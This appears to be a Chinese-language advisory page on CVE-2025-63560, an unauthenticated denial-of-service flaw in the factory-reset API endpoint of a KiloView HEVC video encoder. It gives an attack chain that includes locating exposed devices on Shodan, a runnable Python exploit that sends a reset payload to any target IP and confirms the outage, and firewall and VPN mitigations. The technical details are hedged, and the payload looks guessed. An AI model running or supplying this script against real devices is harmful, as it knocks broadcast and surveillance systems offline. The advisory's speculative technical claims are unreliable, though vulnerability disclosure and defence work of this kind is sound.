CVE-2025-63560 KiloView视频编码器System/reFactory组件拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-63560

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder

漏洞概述

CVE-2025-63560是存在于KiloView公司生产的Dual Channel 4k HDMI & 3G-SDI HEVC视频编码器固件中的一个拒绝服务漏洞。该漏洞位于设备的systemctrl API的System/reFactory组件中，固件版本为v.1.20.0006。攻击者可以利用该漏洞通过发送特制的请求到systemctrl API的System/reFactory端点，无需任何认证即可触发设备拒绝服务状态。该漏洞的CVSS评分为7.5，属于高危级别，主要影响可用性维度。由于该设备通常部署在视频监控、直播推流、广播系统等场景中，漏洞被利用可能导致视频流中断，影响正常的监控和录制功能。攻击向量为网络层面，攻击者可以从互联网远程发起攻击，无需获取任何凭据或进行用户交互。

技术细节

漏洞根源在于KiloView视频编码器固件v.1.20.0006中systemctrl API的System/reFactory组件缺乏足够的输入验证和错误处理机制。攻击者通过向该API端点发送特定的HTTP请求或构造恶意参数，可以导致设备处理流程异常。System/reFactory组件设计用于执行系统恢复或重置操作，但未对调用来源和请求参数进行严格校验。攻击者无需任何认证（PR:N），可以直接通过HTTP/HTTPS协议向设备发送恶意请求（AV:N）。由于AC:L（低攻击复杂度）和UI:N（无需用户交互）的特性，攻击者可以轻易构造并发送攻击载荷。当攻击请求被处理后，可能导致设备进程崩溃、服务中断或系统无响应，从而造成可用性影响（A:H）。受影响设备通常开放80/443端口用于Web管理界面，攻击者可以通过扫描互联网上的设备IP直接发起攻击。

攻击链分析

STEP 1

步骤1: 资产发现

攻击者通过Shodan、Censys等搜索引擎或网络扫描发现暴露在互联网上的KiloView视频编码器设备，通常通过识别特定的HTTP响应特征或开放端口（80/443）进行识别

STEP 2

步骤2: 漏洞验证

攻击者访问/systemctrl/api/System/reFactory端点，确认设备版本为v.1.20.0006，并测试API响应以验证漏洞存在性

STEP 3

步骤3: 构造攻击载荷

攻击者构造包含恶意参数的HTTP POST请求，针对System/reFactory组件发送特制payload，可能包含非法参数值或超长字符串

STEP 4

步骤4: 发送攻击请求

无需任何认证，攻击者直接向目标设备发送恶意请求，由于PR:N（无需认证）和UI:N（无需交互）特性，攻击可完全自动化执行

STEP 5

步骤5: 触发拒绝服务

恶意请求被处理后，导致设备进程崩溃、服务中断或系统无响应，设备无法正常处理视频流

STEP 6

步骤6: 影响确认

攻击成功后，设备Web管理界面无法访问，视频流中断，监控和录制功能停止，直到设备手动重启恢复

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
import time

# CVE-2025-63560 PoC
# Target: KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006
# Vulnerability: System/reFactory component in systemctrl API allows DoS without authentication

def exploit(target_ip, target_port=80):
    """
    Exploit for CVE-2025-63560
    Sends malicious request to systemctrl API System/reFactory endpoint
    """
    url = f"http://{target_ip}:{target_port}/systemctrl/api/System/reFactory"
    
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-63560-PoC)'
    }
    
    # Malicious payload that triggers DoS condition
    payload = {
        'action': 'reset',
        'type': 'factory',
        'params': {
            'force': True,
            'timeout': 0  # Invalid timeout value
        }
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text}")
        
        # Verify if device is unresponsive
        time.sleep(3)
        check_url = f"http://{target_ip}:{target_port}/"
        try:
            health_check = requests.get(check_url, timeout=5)
            print(f"[*] Device still responsive")
        except requests.exceptions.RequestException:
            print(f"[!] Device appears to be non-responsive - DoS successful")
            return True
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

影响范围

KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006

防御指南

临时缓解措施

在网络层面实施访问控制策略，通过防火墙或ACL限制对视频编码器管理接口的访问，仅允许授权IP地址访问；对于暴露在互联网的设备，建议将其置于VPN或专用网络中；临时禁用systemctrl API的远程访问功能；部署入侵检测系统监控异常请求模式；定期检查设备日志以便及时发现攻击迹象。